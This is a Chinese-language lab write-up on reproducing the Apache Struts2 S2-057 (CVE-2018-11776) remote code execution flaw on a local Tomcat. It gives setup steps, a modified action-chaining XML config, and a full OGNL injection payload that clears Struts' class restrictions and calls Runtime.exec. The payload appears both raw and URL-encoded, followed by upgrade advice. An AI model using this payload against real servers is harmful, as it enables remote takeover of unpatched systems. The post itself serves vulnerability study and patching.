Struts2-057漏洞从搭建到复现

发表于:2018-08-30 10:11:12 来源:  合天网安实验室 阅读数(0人)

漏洞介绍:


漏洞描述:


2018年8月23日,Apache Strust2发布最新安全公告,Apache Struts2 存在远程代码执行的高危漏洞,该漏洞由Semmle Security Research team的安全研究员汇报,漏洞编号为CVE-2018-11776(S2-057)。Struts2在XML配置中如果namespace值未设置且(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。


影响版本:


Struts 2.3 to 2.3.34 and Struts 2.5 to 2.5.16


CVE编号:


CVE-2018-11776


漏洞复现:


复现环境:


操作系统:Windows 10


操作系统:Windows 10


Tomcat版本:Apache Tomcat/7.0.88


环境搭建:


首先在安装struts环境之前我们先在自己电脑上安装jdk环境,再设置好环境变量。这个我就不细说了,相信大家都会。接着我们把tomcat包解压。




完成后,将Struts-2.3.34.下载完成后我们把该压缩包里的struts2-showcase.war放至在tomcat下的webapps目录下进行自动部署。


Struts-2.3.34下载地址:http://archive.apache.org/dist/struts/2.3.34/struts-2.3.34-all.zip


War放至完成后我们再来在tomcat下bin目录下运行startup.bat脚本就可以自动运行tomcat来部署struts2了。成功部署完成后我们在浏览器中输入http://127.0.0.1:8080/struts2-showcase就可以部署成功了。




正常部署完成struts如上所示,但为了复现struts2-057漏洞。我们的满足跳转的条件。故此我们的进行修改默认的action控制器来设置跳转的逻辑。方便我们复现漏洞。


需要修改的地方有两处:


1.D:\tomcat\webapps\struts2-showcase\WEB-INF\src\java\struts-actionchaining.xml


2.D:\tomcat\webapps\struts2-showcase\WEB-INF\classes\struts-actionchaining.xml


我们注释掉原来的xml文件。修改为如下所示:




代码如下:


<code>
	<struts>
		<package name="actionchaining" extends="struts-default">
			<action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
				<result type="redirectAction">
	             <param name = "actionName">register2</param>
	           </result>
			</action>
			<action name="actionChain2" class="org.apache.struts2.showcase.actionchaining.ActionChain2">
				<result type="chain">actionChain3</result>
			</action>
			<action name="actionChain3" class="org.apache.struts2.showcase.actionchaining.ActionChain3">
				<result>/WEB-INF/actionchaining/actionChainingResult.jsp</result>
			</action>
		</package>
	</struts>
</code>
					

修改完成后保存重启tomcat服务。


漏洞测试:


配置好所有所需的环境之后,我们来测试struts2-057漏洞。


首先我们构造payload:


http://127.0.0.1:8080/struts2-showcase/${(222+333)}/actionChain1.action


执行完成之后发现跳转到了:


http://127.0.0.1:8080/struts2-showcase/555/register2.action




222+333=555发生了运算跳转。说明存在OGNL注入。证明漏洞存在。随后在进行调用本地计算器命令来测试。


Payload如下所示:


${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec("calc"))}

执行之前我们先进行URL编码得到如下:


%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%63%6d%64%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%29%7d
					

拼接如下的url进行测试:


http://127.0.0.1:8080/struts2-showcase/%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%63%6d%64%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%29%7d/actionChain1.action

成功调用本地计算器。




修复建议:


1.升级到Struts 2.3.35或Struts 2.5.17的高版本


2.验证您是否已namespace为基础配置中的所有已定义结果设置(并且始终不会忘记设置)(如果适用)。还要验证您是否已设置(并且始终不会忘记设置)value或JSP中的action所有url标记。仅当它们的上部动作配置没有或通配符时才需要它们namespace。


相关新闻

大家都在学

课程详情

信息安全意识教育

课程详情

小白入门之旅

课程详情

信息安全基础